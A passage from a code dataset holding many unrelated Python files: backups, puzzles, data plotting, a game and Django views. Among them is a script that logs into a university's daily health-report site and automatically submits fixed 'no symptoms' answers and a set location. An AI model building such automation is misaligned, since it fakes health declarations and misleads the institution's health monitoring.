datetime.utcnow().strftime(\"%Y_%m_%d\"))\n\n key = bucket.get_key(name_attempt)\n\n if not key:\n key = Key(bucket)\n key.key = name_attempt\n return key\n else:\n counter = 1\n while True:\n counter += 1\n name_attempt = \"{}__{}_{}.dmp.zip\".format(name_base,\n datetime.utcnow().strftime(\"%Y_%m_%d\"), counter)\n\n if bucket.get_key(name_attempt):\n continue\n else:\n key = Key(bucket)\n key.key = name_attempt\n return key\n\n\ndef backup_to_s3(environment, s3_settings, name, query_set_class):\n\n dump_path = dump_db(environment, QuerySet=query_set_class)\n zipf = zipdir(dump_path)\n\n key = generate_uniqueish_key(s3_settings, environment, name)\n\n bytes_written = key.set_contents_from_filename(zipf.filename)\n\n # 4) print out the name of the bucket\n echo(\"Wrote {} bytes to s3\".format(bytes_written))\n\n\ndef s3_restore(key, to_enviornment):\n\n with temp_directory() as temp_dir:\n zip_path = os.path.join(temp_dir, 'MongoDump.zip')\n key.get_contents_to_filename(zip_path)\n local_restore(zip_path, to_enviornment)\n\n\ndef s3_backups(s3_config):\n \"\"\" a dict of key.name: key\n \"\"\"\n bucket = get_s3_bucket(s3_config)\n\n buckets = {}\n for key in bucket.get_all_keys():\n buckets[key.name] = key\n\n return buckets\n","sub_path":"monarch/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"194333164","text":"import random as rd\nimport copy\n\n########### création ou chargement des tableaux #################\n\n\ndef creer_tableau(n):\n \"\"\" créer une liste de liste de taille nxn \"\"\"\n L = [[]for i in range(n-1)]\n L.append([0 for i in range(n-1)])\n L.append([\"*\" for i in range(n+1)])\n L.append([0 for i in range(n)])\n for i in range(n+2):\n if i != n and i != n+1:\n if i == 0:\n L[i].extend([0 for i in range(n-1)])\n elif 1 <= i <= n-2:\n L[i].append(0)\n L[i].extend([rd.randint(5, 9) for i in range(n-2)])\n 
L[i].extend([0, \"*\", 0])\n L_final = somme(L)\n return L_final\n\n\ndef creer_tableau_2():\n choix = input(\"taper 'nouveau' si vous souhaitez charger un nouveau tableau et taper 'charger' sinon : \")\n if choix == \"charger\":\n nom_fichier = input(\"entrer le nom du fichier (ne pas oublier .txt) : \")\n chargement = open(nom_fichier, \"r\")\n list_chargement = [(line.strip()).split() for line in chargement]\n chargement.close()\n afficher_tableau(list_chargement)\n elif choix == \"nouveau\":\n n = input(\"entrer la taille du tableau (un entier) : \")\n tableau = creer_tableau(int(n))\n afficher_tableau(tableau)\n\n\ndef somme(tab):\n for k in range(len(tab)-2):\n for i in range(len(tab)-2):\n tab[len(tab)-1][k] += tab[i][k]\n tab[k][len(tab)-1] += tab[k][i]\n return tab\n\n\n######### afficher sous forme de tableau ############################\n\n\ndef afficher_tableau(tab):\n \"\"\" affiche la liste de liste sous la forme d'un tableau \"\"\"\n for elem in tab:\n for i in range(len(elem)):\n if i != len(elem)-1:\n if (isinstance(elem[i], int)) and (elem[1] >= 10):\n print(elem[i], end=\" \")\n else:\n print(elem[i], end=\" \")\n else:\n print(elem[i])\n\n\n########## automate des tas de sable version sequentiel ##############\n\n\ndef etape_sequentiel(tab):\n changement = True\n tab_modif = copy.deepcopy(tab)\n\n tab_modif[len(tab)-1].clear()\n tab_modif[len(tab)-1] = [0 for i in range(len(tab)-2)]\n for i in range(len(tab)-3):\n tab_modif[i][len(tab)-1] = 0\n\n for i in range(1, len(tab)-3):\n for k in range(1, len(tab)-3):\n if tab_modif[i][k] >= 4:\n tab_modif[i][k] = tab[i][k] - 4\n tab_modif[i][k-1] += 1\n tab_modif[i][k+1] += 1\n tab_modif[i+1][k] += 1\n tab_modif[i-1][k] += 1\n\n changement = True\n return [tab_modif, changement]\n return [tab, False]\n\n\ndef automate_sequentiel(tab):\n res = etape_sequentiel(tab)\n while res[1]:\n res = etape_sequentiel(res[0])\n res_vrai = somme(res[0])\n return res_vrai\n\n\n####### automate des tas de sable version parallele ##########################\n\n\ndef etape_parallele(tab):\n changement = False\n tab_modif = copy.deepcopy(tab)\n\n tab_modif[len(tab)-1].clear()\n tab_modif[len(tab)-1] = [0 for i in range(len(tab)-2)]\n for i in range(len(tab)-3):\n tab_modif[i][len(tab)-1] = 0\n\n for i in range(1, len(tab)-3):\n for k in range(1, len(tab)-3):\n if tab_modif[i][k] >= 4: \n tab_modif[i][k] = tab_modif[i][k] - 4\n tab_modif[i][k-1] += 1\n tab_modif[i][k+1] += 1\n tab_modif[i+1][k] += 1\n tab_modif[i-1][k] += 1\n\n changement = True\n if changement:\n return [tab_modif, changement]\n else:\n return [tab, changement]\n\ndef automate_parallele1(tab):\n nom_fichier = input(\"entrer le nom du fichier (ne pas oublier .txt) \")\n res = etape_parallele(tab)\n while res[1]:\n res = etape_parallele(res[0])\n res_vrai = somme(res[0])\n Fichier = open(nom_fichier, 'w')\n for elem in res_vrai:\n txt = ' '.join([str(i) for i in elem])\n Fichier.write(txt + '\\n')\n Fichier.close()\n return res[0]\n\n\ndef automate_parallele(tab):\n res = etape_parallele(tab)\n while res[1]:\n res = etape_parallele(res[0])\n res_vrai = somme(res[0])\n return res_vrai\n\n\n############# commandes tests ###################\n\ntest = creer_tableau(4)\nafficher_tableau(test)\nprint(\"------------\")\ntest_para = automate_parallele(test)\nafficher_tableau(test_para)\nprint(\"--------------\")\ntest_seq = automate_sequentiel(test)\nafficher_tableau(test_seq)\n","sub_path":"exercises/in200 
exercices/feuille_exos_3_bis.py","file_name":"feuille_exos_3_bis.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"332125791","text":"def solution(arr, m):\n ptr = -1\n while len(arr) > 1:\n for i in range(m):\n ptr += 1\n if ptr >= len(arr): # reach end\n ptr = 0\n\n p_num = arr.pop(ptr)\n print(p_num, arr)\n ptr = ptr - 1\n\n return arr[ptr]\n\n\nprint(solution(list(range(10)), 3))\n","sub_path":"solutions/array/62_Last_Digit_in_Circle.py","file_name":"62_Last_Digit_in_Circle.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"608225837","text":"import logging\nimport os\n\nfrom clowder.tomcat import ConfigurationException,\\\n NotAnInstance\nfrom clowder.tomcat import Instance\n\nclass Finder(object):\n def __init__(self, root=\"/opt/evive/apps/\"): #root=\"/opt/clowder\"):\n self._root = root\n self.logger = logging.getLogger(\"AppFinder\")\n\n def all(self):\n basenames = [x for x in os.listdir(self._root)\n if os.path.isdir(os.path.join(self._root, x))]\n app_instances = filter(lambda x: len(x) == 2, [tuple(x.split(\".\")) for x in basenames])\n apps = {}\n for base in app_instances:\n try:\n app = Instance(name=base[0], instance=base[1], root=self._root)\n apps[base] = app\n except (NotAnInstance,ConfigurationException) as e:\n self.logger.info(\"{message}\".format(message=e.message))\n return apps\n\n def find(self, name, instance=None):\n if instance:\n return {k:v for k,v in self.all().items() if k == (name, instance)}\n else:\n return {k:v for k,v in self.all().items() if k[0] == name}\n","sub_path":"clowder/tomcat/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"210190451","text":"import unittest\nfrom datetime import date\n\n\nfrom domain.research.factories.research_daily_journal_factory import ResearchDailyJournalFactory\nfrom domain.research.factories.research_factory import GynecologicResearchFactory\nfrom domain.research.repositories.research_daily_journal_repository import ResearchDailyJournalRepository\nfrom usecases.new_research_usecase import NewResearchUseCase\nfrom usecases.utils import ResearchData\n\n\njournal_factory = ResearchDailyJournalFactory()\njournal_repository = ResearchDailyJournalRepository()\ntoday = date(2016, 5, 1)\nresearch_factory = GynecologicResearchFactory()\n\n\nclass TestSaveResearch(unittest.TestCase):\n\n def setUp(self):\n journal = journal_factory.journal(today)\n journal_repository.add_journal(journal)\n\n def test(self):\n expected = research_factory.new_research()\n expected.mark_cell_smear_adequate()\n research_data = ResearchData(\n cell_smear_quality='adequate',\n cell_smear_type='',\n epithelium_surface='',\n epithelium_basal='',\n epithelium_cylindrical='',\n leukocytes='',\n description=''\n )\n journal = journal_repository.find_journal_by_date(today)\n use_case = NewResearchUseCase(journal)\n use_case.execute(research_data)\n\n result = journal.find_by_index(0)\n\n self.assertEqual(expected, result)\n","sub_path":"source/test/test_usecase/test_save_research.py","file_name":"test_save_research.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"103921668","text":"if __name__ == '__main__':\n import argparse\n 
parser = argparse.ArgumentParser(prog='merge_bxcan.py', description='''\n    Merge BrainXcan results from dMRI and T1.\n    ''')\n    parser.add_argument('--dmri', help='''\n    Input S-BrainXcan result for dMRI IDPs.\n    ''')\n    parser.add_argument('--t1', help='''\n    Input S-BrainXcan result for T1 IDPs.\n    ''')\n    parser.add_argument('--idp_meta_file', help='''\n    A meta file for annotating IDPs.\n    ''')\n    parser.add_argument('--output', help='''\n    Output table.\n    ''')\n    args = parser.parse_args()\n\n    import logging, time, sys, os\n    # configure logging\n    logging.basicConfig(\n        level = logging.INFO,\n        stream = sys.stderr,\n        format = '%(asctime)s %(message)s',\n        datefmt = '%Y-%m-%d %I:%M:%S %p'\n    )\n    import pandas as pd\n\n    logging.info('Loading S-BrainXcan dMRI.')\n    df1 = pd.read_csv(args.dmri)\n    df1['modality'] = 'dMRI'\n    logging.info('{} IDPs in total.'.format(df1.shape[0]))\n\n    logging.info('Loading S-BrainXcan T1.')\n    df2 = pd.read_csv(args.t1)\n    df2['modality'] = 'T1'\n    logging.info('{} IDPs in total.'.format(df2.shape[0]))\n\n    logging.info('Loading the IDP meta file.')\n    meta = pd.read_csv(args.idp_meta_file)\n\n    logging.info('Saving outputs.')\n    df = pd.concat([df1, df2], axis=0)\n    df = pd.merge(df, meta.drop(columns=['t1_or_dmri', 'ukb_link']), on='IDP', how='left')\n    df.fillna('NA', inplace=True)\n    df.sort_values(by='pval').to_csv(args.output, index=False)\n\n    logging.info('Done.')\n","sub_path":"brainxcan/snmk/merge_bxcan.py","file_name":"merge_bxcan.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"512123369","text":"def solution(weights, head2head):\n\n    # declare the number of players n and the lists result, answer\n    n= len(weights)\n    result,answer=[],[]\n\n    # repeat once per player\n    for i in range (n):\n        # count each player's wins and losses\n        win= head2head[i].count('W')\n        lose= head2head[i].count('L')\n\n        # condition 2) counter for wins against heavier boxers\n        heavy_win= 0\n\n        # if win+lose is 0, every record is 'N' => treat the win rate as 0\n        if (win+lose) == 0:\n            win_rate= 0\n        else:\n            # compute the win rate\n            win_rate= win / (win+lose)\n\n        for j in range(n):\n            # skip the index where a player fights himself\n            if i == j:\n                continue\n            # check for a win against a heavier boxer\n            if head2head[i][j]=='W' and weights[i] < weights[j]:\n                heavy_win += 1\n\n        # store win rate, wins over heavier boxers, weight, player number in result\n        result.append([-win_rate, -heavy_win, -weights[i],i+1])\n\n    # after sorting, keep only the player numbers in answer and return it\n    result.sort()\n    answer = [x[-1] for x in result]\n    return answer","sub_path":"6week/6week_kyk.py","file_name":"6week_kyk.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"409589674","text":"import pandas as pd\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\n\n# Load CSV file from Datasets folder\ndf = pd.read_csv('../Datasets/Weather2014-15.csv')\n\n# Extracting the actual max temp per month\nnew_df = df.groupby('month', sort=False).agg(\n    {'actual_max_temp': 'max'}).reset_index()\n\n# Preparing data\ndata = [go.Scatter(x=new_df['month'], y=new_df['actual_max_temp'], mode='lines',\n                   name='Record Max Temperature')]\n\n# Preparing layout\nlayout = go.Layout(title='The Actual Max Temperature of Each Month From 2014 To 2015',\n                   xaxis_title=\"Month\", yaxis_title=\"Temperature (F)\")\n\n# Plot the figure and save it in an html file\nfig = go.Figure(data=data, layout=layout)\npyo.plot(fig, 
filename='WeatherLineChart.html')","sub_path":"Plots/WeatherLineChart.py","file_name":"WeatherLineChart.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"122842692","text":"import os\nimport logging\nimport hydra\nfrom solver import main\nfrom omegaconf import OmegaConf, DictConfig\n\nlog = logging.getLogger(__name__)\n\n@hydra.main(config_path=\"conf\", config_name=\"default.yaml\")\ndef run_experiment(cfg: DictConfig) -> None:\n # print(OmegaConf.to_yaml(cfg))\n \n # read params\n p = cfg.solver.penalty\n nV = cfg.solver.num_vehicle\n num_fss = cfg.solver.first_solution_strategy.num_fss\n \n ds, td, tl = main(p, nV, num_fss)\n print(\"Dropped nodes :\", ds)\n print(\"Total distance :\", td)\n print(\"Total load :\", tl)\n\n log.info(\"Dropped nodes :{}\".format(ds))\n log.info(\"Total distance :{}\".format(td))\n log.info(\"Total load :{}\".format(tl))\n\nif __name__ == '__main__':\n run_experiment()","sub_path":"h_experiment.py","file_name":"h_experiment.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"430858855","text":"import re\nimport requests\nimport json #用于读取账号信息\nimport time #用于计时重新发送requests请求\nimport base64 #用于解密编码\nimport logging #用于日志控制\nimport os,sys\nfrom lxml import etree # 可以利用Xpath进行文本解析的库\n# 发送邮件的库\nimport smtplib\nfrom email.mime.text import MIMEText\n\n#账号 密码等信息 Actions部署\nid = os.environ[\"id\"]\npwd = os.environ[\"pwd\"]\n# 邮箱信息\nMAIL_USER = os.environ[\"MAIL_USER\"] #QQ邮箱账户\nMAIL_PWD = os.environ[\"MAIL_PWD\"] #QQ邮箱授权码\nMAIL_TO = os.environ[\"MAIL_TO\"] #QQ邮箱账户\n\n# 本地运行就直接填上相应信息,所有信息需要被双引号\"\"包裹\n# id = \"学号\"\n# pwd = \"密码\"\n# MAIL_USER = \"QQ邮箱账户\"\n# # 这里是授权码--不是账户密码\n# MAIL_PWD = \"邮箱授权码\"\n# MAIL_TO = \"QQ邮箱账户\"\n#账号和密码需要被双引号\"\"包裹\n# eg:\n# id = \"学号\"\n# pwd = \"密码\"\n\ndef sign_in(id, pwd):\n\n curr_dir = os.path.dirname(os.path.abspath(__file__))\n r=\"\"\n\n #set logging format\n LOG_FORMAT = \"%(asctime)s - %(levelname)s - %(message)s\"\n DATE_FORMAT = \"%m/%d/%Y %H:%M:%S %p\"\n #create a log file at the work directory\n\n # 日志文件my.log会保存在该python文件所在目录当中\n logging.basicConfig(filename=curr_dir+'/my.log', level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT)\n\n logging.info(\"===开始打卡===\")\n\n #login\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/first0?fun2=a',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n form={\n \"uid\": id,\n \"upw\": pwd,\n \"smbtn\": \"进入健康状况上报平台\",\n \"hh28\": \"750\" #按照当前浏览器窗口大小计算\n }\n r = \"\"\n max_punch = 10\n curr_punch = 0 #if curr_punch > max_pubch then exit\n logging.info(\"准备进入打卡界面\")\n while True:\n try:\n logging.info(\"准备进入post请求\")\n r= requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login\",headers=headers,data=form,timeout=(200,200)) #response为账号密码对应的ptopid和sid信息,timeout=60(sec)\n logging.info(\"成功运行post请求\")\n except:\n logging.warning(\"请检查网络链接是否正常\")\n curr_punch+=1\n if curr_punch>max_punch:\n exit()\n time.sleep(120) #sleep 60 sec\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #first6\n matchObj = re.search(r'ptopid=(\\w+)\\&sid=(\\w+)\\\"',text)\n try:\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n except:\n logging.warning(\"请检查账号\"+id+\"和密码\"+pwd+\"是否正确,或检查是否有验证码\")\n exit()\n 
else:\n logging.info(\"账号密码正确\")\n headers= {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login'\n }\n curr_punch=0\n while True:\n try:\n r = requests.get(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid=\"+ptopid+\"&sid=\"+sid+\"&fun2=\") #response里含有jksb对应的params\n except:\n logging.error(\"get请求失败\")\n if curr_punch>max_punch:\n exit()\n curr_punch+=1\n time.sleep(120)\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n tree=etree.HTML(text)\n nodes = tree.xpath('//*[@id=\"bak_0\"]/div[7]/span')\n # 如果今日填报过就退出填报,直接返回msg\n if nodes[0].text == \"今日您已经填报过了\":\n return nodes[0].text\n r.close()\n del(r)\n #jksb?with_params\n matchObj = re.search(r'ptopid=(\\w+)\\&sid=(\\w+)\\&',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/login'\n }\n curr_punch=0\n while True:\n try:\n r = requests.get(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid=\"+ptopid+\"&sid=\"+sid+\"&fun2=\",headers=headers) #response为jksb表单第一页\n except:\n logging.info(\"第二次get请求失败\")\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n time.sleep(120)\n else:\n break\n ptopid1 = ptopid\n sid1 = sid\n\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #DONE\n matchObj = re.search(r'name=\\\"ptopid\\\" value=\\\"(\\w+)\\\".+name=\\\"sid\\\" value=\\\"(\\w+)\\\".+',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n form = {\n \"day6\": \"b\",\n \"did\": \"1\",\n \"door\": \"\",\n \"men6\": \"a\",\n \"ptopid\": ptopid,\n \"sid\": sid\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Referer': 'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb?ptopid='+ptopid1+'&sid='+sid1+'&fun2=',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n while True:\n try:\n r = requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb\",headers=headers,data=form) #response为打卡的第二个表单\n except:\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n #DONE\n matchObj = re.search(r'name=\\\"ptopid\\\" value=\\\"(\\w+)\\\".+name=\\\"sid\\\" value=\\\"(\\w+)\\\"',text)\n ptopid = matchObj.group(1)\n sid = matchObj.group(2)\n form = {\n \"myvs_1\": \"否\",\n \"myvs_2\": \"否\",\n \"myvs_3\": \"否\",\n \"myvs_4\": \"否\",\n \"myvs_5\": \"否\",\n \"myvs_6\": \"否\",\n \"myvs_7\": \"否\",\n \"myvs_8\": \"否\",\n \"myvs_9\": \"否\",\n \"myvs_10\": \"否\",\n \"myvs_11\": \"否\",\n \"myvs_12\": \"否\",\n \"myvs_13\": \"g\",\n \"myvs_13a\": \"41\",\n \"myvs_13b\": \"4101\",\n \"myvs_13c\": \"河南省.郑州市.金水区\",\n \"myvs_24\": \"否\",\n \"myvs_26\": \"2\",\n \"myvs_14b\": \"\", #该选项已弃用\n \"memo22\": \"[待定]\",\n \"did\": \"2\",\n \"door\": \"\",\n \"day6\": \"b\",\n \"men6\": \"a\",\n \"sheng6\": \"\",\n \"shi6\": \"\",\n \"fun3\": \"\",\n \"jingdu\": \"113.64\",\n \"weidu\": \"34.71\",\n \"ptopid\": ptopid,\n \"sid\": sid\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Referer':'https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb',\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n while True:\n try:\n r = 
requests.post(\"https://jksb.v.zzu.edu.cn/vls6sss/zzujksb.dll/jksb\",data=form,headers=headers) #response为完成打卡页面\n except:\n while curr_punch>max_punch:\n exit()\n curr_punch+=1\n else:\n break\n text = r.text.encode(r.encoding).decode(r.apparent_encoding) #解决乱码问题\n r.close()\n del(r)\n # 对text文件进行解析\n tree=etree.HTML(text)\n # print(type(tree))\n nodes = tree.xpath('//*[@id=\"bak_0\"]/div[2]/div[2]/div[2]/div[2]')\n for _ in nodes:\n msg = _.text\n if(\"感谢你今日上报健康状况!\" in msg):\n logging.info(id+\":打卡成功\")\n print(id+\":打卡成功\")\n \n else:\n logging.info(id+\":打卡失败\")\n print(id+\":打卡失败\")\n \n return msg\n\n\n\n# 发送邮件的函数\ndef mail(mail_text, mail_to):\n # set the mail context\n msg = MIMEText(mail_text)\n\n # set the mail info\n msg['Subject'] = \"每日健康打卡通知\" #主题\n msg['From'] = MAIL_USER\n msg['To'] = mail_to\n\n # send the mail\n # 发送到QQ邮箱\n send = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n send.login(MAIL_USER, MAIL_PWD)\n send.send_message(msg)\n # quit QQ EMail\n send.quit()\n\nif __name__ == '__main__':\n msg = sign_in(id=id, pwd=pwd)\n mail(msg,MAIL_TO)\n\n","sub_path":"jksb.py","file_name":"jksb.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"463085884","text":"class WarpDest():\n ''' Warp Speed: \n One's based GALAXY navigation.\n Guaranteed SAFE placement.\n '''\n def __init__(self, sector=-1, warp=0):\n if sector > 64: sector = 64 # zOuter Limits =)\n if warp > 10: warp = 10\n if warp < 0: warp = 0\n self.warp = warp\n self.sector = sector\n\n @staticmethod\n def parse(dest, sep=','):\n '''\n Parse: sector-num, speed-float - None on error\n Example: 5,1.1 \n '''\n dest = str(dest)\n cols = dest.split(sep)\n if len(cols) == 2:\n try:\n sector = int(cols[0].strip())\n if sector < 1:\n sector = 1\n speed = float(cols[1].strip())\n if speed < 0: speed = 0.1\n if speed > 9: speed = 9.0\n return WarpDest(sector, speed)\n except:\n pass\n return None\n\n\nclass SubDest():\n ''' Sublight Navigation:\n Zero based, AREA placement.\n Caveat, User! 
;-)\n '''\n def __init__(self, xpos=-1, ypos=-1):\n if xpos > 7: xpos = 7\n if ypos > 7: ypos = 7\n if xpos < 0: xpos = 0\n if ypos < 0: ypos = 0\n self.xpos = xpos\n self.ypos = ypos\n\n @staticmethod\n def parse(dest, sep=','):\n '''\n WARNING: USER 1's -> 0-BASED TRANSLATION HERE\n\n Parse: [a-h], ypos \n or \n #,# \n Return None on error\n Example: b,5 \n '''\n dest = str(dest)\n cols = dest.split(sep)\n if len(cols) == 2:\n try:\n alph = cols[0].strip().lower()[0]\n num = 0\n if alph.isalpha():\n num = ord(alph) - 96 # 'a' == 1\n else:\n num = int(alph)\n xpos = num\n ypos = int(cols[1].strip()[0])\n return SubDest(xpos-1, ypos-1)\n except:\n pass\n return None\n\n\nclass Dest(WarpDest, SubDest):\n\n def __init__(self):\n WarpDest.__init__(self)\n SubDest.__init__(self)\n\n def is_null(self):\n return self.xpos == 0 and \\\n self.sector == -1\n\n def clone(self):\n result = Dest()\n result.xpos = self.xpos\n result.ypos = self.ypos\n result.sector = self.sector\n result.warp = self.warp\n return result\n\n\nif __name__ == '__main__':\n test = Dest()\n assert(test.is_null() == True)\n test.xpos = test.ypos = 123\n test.sector = 22\n test.warp = 22\n assert(test.is_null() == False)\n clone = test.clone()\n assert(clone.sector == test.sector)\n assert(clone.warp == test.warp)\n assert(clone.xpos == test.xpos)\n assert(clone.ypos == test.ypos)\n\n","sub_path":"Points.py","file_name":"Points.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47746744","text":"#-*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport random\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport socket\r\nimport csv\r\n\r\nfrom django.contrib import auth\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.core.paginator import Paginator\r\nfrom django.core.urlresolvers import reverse\r\nfrom django.db.models import Q\r\nfrom django.http.response import HttpResponse, JsonResponse\r\nfrom django.shortcuts import render_to_response, redirect\r\nfrom django.template.context_processors import csrf\r\n\r\nfrom .cleaner import phone_validator\r\nfrom .forms import ClientForm, StatisticSearch, RecordForm, UploadFileForm\r\nfrom .models import Clients, Statistics, Records\r\n\r\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\r\n\r\n\r\n# def originate(request):\r\n# if request.is_ajax():\r\n# id = request.GET['id']\r\n# user = request.user.username\r\n# model_base_name = user + '_base'\r\n# model_base = apps.get_model('inform', model_base_name)\r\n# model_stats_name = user + '_stats'\r\n# model_stats = apps.get_model('inform', model_stats_name)\r\n# client = model_base.objects.get(id=id)\r\n# name = client.name\r\n# phone = client.phone\r\n# record = client.record\r\n# am = Ami()\r\n# am.connect()\r\n# origin = am.originate('9' + phone, record, user)\r\n# am.disconnect()\r\n# if origin['Response'] == 'Success':\r\n# status = 'ANSWER'\r\n# else:\r\n# status = 'NOANSWER'\r\n# time_now = datetime.datetime.now().strftime('%H:%M')\r\n# date_now = datetime.datetime.now().strftime('%Y-%m-%d')\r\n# model_stats.objects.create(name=name, phone=phone, record=record, date=date_now, time=time_now, status=status)\r\n# model_base.objects.get(id=id).delete()\r\n# response_data = {\r\n# 'id': id,\r\n# 'name': name,\r\n# 'phone': phone,\r\n# 'record': record,\r\n# 'date': date_now,\r\n# 'time': time_now,\r\n# 'status': status,\r\n# }\r\n# 
return JsonResponse(response_data)\r\n\r\n\r\ndef parse_row(row, line, user):\r\n if len(row) != 3:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: Неверное количество данных для '\r\n u'загрузки'.format(line)\r\n }\r\n try:\r\n row[0].decode('utf-8')\r\n decoding = 'utf-8'\r\n except UnicodeDecodeError:\r\n decoding = 'cp1251'\r\n client_name = row[0].decode(decoding)\r\n client_phone = row[1].decode(decoding)\r\n client_record = row[2].decode(decoding)\r\n phone = phone_validator(client_phone)\r\n if not phone['valid']:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: '\r\n u'Неверный формат номера телефона'.format(line)\r\n }\r\n records_list = Records.objects.filter(\r\n user=user\r\n ).values_list('title', flat=True)\r\n if client_record not in records_list:\r\n return {\r\n 'valid': False,\r\n 'message': u'Строка {}: Запись \"{}\" не найдена для текущего '\r\n u'пользователя'.format(line, client_record)\r\n }\r\n record = Records.objects.get(title=client_record, user=user)\r\n to_create = Clients(user=user, name=client_name,\r\n phone=client_phone, record=record)\r\n return {'valid': True, 'to_create': to_create}\r\n\r\n\r\ndef index(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n return redirect(reverse('inform:clients'))\r\n else:\r\n return redirect(reverse('inform:login'))\r\n\r\n\r\ndef clients(request):\r\n user = auth.get_user(request)\r\n context = {}\r\n context.update(csrf(request))\r\n message_success = ''\r\n message_error = ''\r\n\r\n if request.POST:\r\n if request.FILES:\r\n file_form = UploadFileForm(request.POST, request.FILES)\r\n if file_form.is_valid():\r\n upload_file = request.FILES['file']\r\n file = str(upload_file).split('.')\r\n file_type = file[-1]\r\n warnings = []\r\n to_create = []\r\n\r\n if file_type == 'txt':\r\n row_reader = upload_file.readlines()\r\n for line, row in enumerate(row_reader, 1):\r\n row = row.rstrip().split(';')\r\n row_valid = parse_row(row, line, user)\r\n if not row_valid['valid']:\r\n warnings.append(row_valid['message'])\r\n continue\r\n to_create.append(row_valid['to_create'])\r\n\r\n elif file_type == 'csv':\r\n row_reader = csv.reader(upload_file, delimiter=';')\r\n for line, row in enumerate(row_reader, 1):\r\n row_valid = parse_row(row, line, user)\r\n if not row_valid['valid']:\r\n warnings.append(row_valid['message'])\r\n continue\r\n to_create.append(row_valid['to_create'])\r\n success = len(to_create)\r\n message_success = u'Добавлено записей: {}'.format(success)\r\n message_warning = u'
